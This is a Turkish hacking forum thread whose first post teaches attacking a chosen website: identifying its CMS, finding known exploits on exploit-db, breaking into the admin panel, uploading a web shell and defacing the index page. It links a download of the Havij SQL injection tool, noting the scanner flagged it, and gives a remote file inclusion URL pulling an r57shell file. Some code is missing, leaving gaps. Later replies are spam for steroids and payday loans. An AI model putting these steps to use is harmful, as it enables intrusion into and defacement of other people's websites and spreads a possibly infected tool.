Thread Rating:
  • 0 Vote(s) - 0 Average
  • 1
  • 2
  • 3
  • 4
  • 5
Hedef Site Hackleme
#1
İlk olarak şunu belirteyim ; programla hack olmaz hele hedef site hiç olmaz...

Ben bunu Acunetixle yada bilmemne tarayıcısı ile taradım, şunu bunu buldu aha hackliyeceğim diye bir şey yoktur. Bu şekilde hack yapamazsın!

Şimdi diyorsunuzdur ki içinizden : Eee nediyor bu adam böyle nasıl tarıyacaz, program olmadan.

Program olmadan hack nasıl yapacağız ?

-Manual yni elle tarıyacağız...En iyi tarama yöntemi budur. Hatta tek iyi tarama yöntemi...

Doğru yapıldığı taktirde hacklemeniz garantidir... Tabii ki bir ihtimal olmayabilir.

En azından programların size verdiği gereksiz ve saçma log dosyalarından kurtulmuş olacağız...

Şimdi Öncelikle Hedef Sitemizi Tanımamız Gerekiyor

-Hangi Dilde Yazılmış? : Php,Asp,Html...

-Özel Bir Scripti Varmı? Vbulletin,mybb...

-Kurumsal Yada Öteki Piyasada Bulunan Scriptlerden Birine mi Ait? Kişisel ve Firimasal Scriptler, Yahut diğer Scriptler...

__________________________________________________

EĞER SCRİPTİNİ BULDUYSANIZ ŞİMDİ O SCRİPTTE DAHA ÖNCEDEN BULUNMUŞ AÇIK VARMI ONA BAKALIM

Bunu öğrenmek için şu sitelerden script adını taratınız

http://www.exploit-db.com/

En ünlü ve en ilgi gören exploit siteleri bunlardır... bunların dışında Başka Sitelerde de taratabilirsiniz. Ama Öncelikli tercih 1337. Arattık ve Açık

bulduk diyelim... Panele daldıktan sonra yapacaklarımız Neler? Napıcaz? oturup bekliyecek halimiz yok tabii ki...

-Exploitimizi kullanıp Admin paneline dalıyoruz.

-Shell upload ediyoruz.

-İndeximizi basıyoruz.

SHELL UPLOAD OLMUYORMU?

Hacklediğiniz bir siteye yönlendirerekindexin orda görünmesini sağlarız... Nasılmı Aşşağıdaki kodu ana sayfadaki bir dökümana herhangi ekliyerek


veriyorsa Açık vardır. Bundan sonra manual veya havij ile yapılabilir.

Panele daldık nemi yapacağız.

Yukarda Anlatmıştım...


Link: http://www.dosya.tc/server5/hsrZvJ/havij1.16.zip.html

Virus Scan : http://virusscan.jotti.org/tr/scanre...d3efcb16dbe847

(2 tane buldu ama zararı olmayan)
__________________________________________________

RFI AÇIKLARINI TARAYALIM

Günümüzde nerdeyse hiç rastlamadığımız rfi açıkları artık ölü bir açık haline gelmiştir...

Nadir olsada bazı sitelerde rastlıyabiliyoruz...ID değerli yada include.php türü bir dosya lazım bize... Uzaktan dosya dahil edeceğimiz serverimize bu

şekilde... Misal bir Shell kodu olabilir bu. Peki nasıl m yapacağız

http://hedefsite.com/include.php=Htt.../r57shell.txt?

"?" mutlaka bulunmalıdır.

Açık varsa karşımıza çıkacaktır... Bizde indeximizi basarız...
Reply
#2
Hello. And Bye.
Reply
#3
Hello. And Bye.
Reply
#4
Hello. And Bye.
Reply
#5
anabolic
- steroid

steroids
- steroids
Reply
#6
payday loans online - https://badcreditloanserag.org/
no credit check loans bad credit loan
Reply


Forum Jump:


Users browsing this thread: 2 Guest(s)